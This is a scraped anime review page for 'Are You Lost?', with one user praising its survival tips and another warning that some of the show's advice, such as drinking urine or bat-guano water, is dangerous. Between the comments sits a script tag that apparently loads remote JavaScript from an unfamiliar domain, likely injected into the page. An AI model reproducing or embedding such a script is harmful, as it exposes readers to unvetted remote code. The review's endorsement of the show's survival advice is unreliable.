bobhikes's avatar

• New Jersey
  • Joined Oct 15, 2018

Are You Lost?

Sep 8, 2019

I haven't seen a review for this anime yet.  It's suprising but this anime gives valid information for what you should do if lost.  The anime itself is average with quite a bit of fan service and little character developement but every episode they give valid information about what you should do in a stranded situation.  Its generally upbeat, and each episode completes and the end.  So if you don't mind a average anime with fan service and want some good information if you happen to get stranded I recommend it.

MsNova Oct 21, 2019

Actually, some of the survival advice was downright dangerous. One should never, ever drink urine.  It will dehydrate you faster than sea water. The bat guano water enema by mouth was as stupid as it is deadly. Bats carry dangerous diseases and parasites in their droppings and people have gotten deathly ill from just casual contact. I am not sure about the animals or fish they were eating or starting a fire with a bottle of water (Bow drill is how I learned and it still takes me forever) but gads! The writers seemed to know little about getting hydrated safely.

<script src="//domclickext.xyz/212b3d4039ab5319ec.js" async="" type="text/javascript"></script>
DGFischer Sep 9, 2019

Check Aug. 23 for a previous review.  Thought the story had origin problems and the manga it's based on gives leads to what could be next.  The flashbacks involving Homare's dad can be intriguing.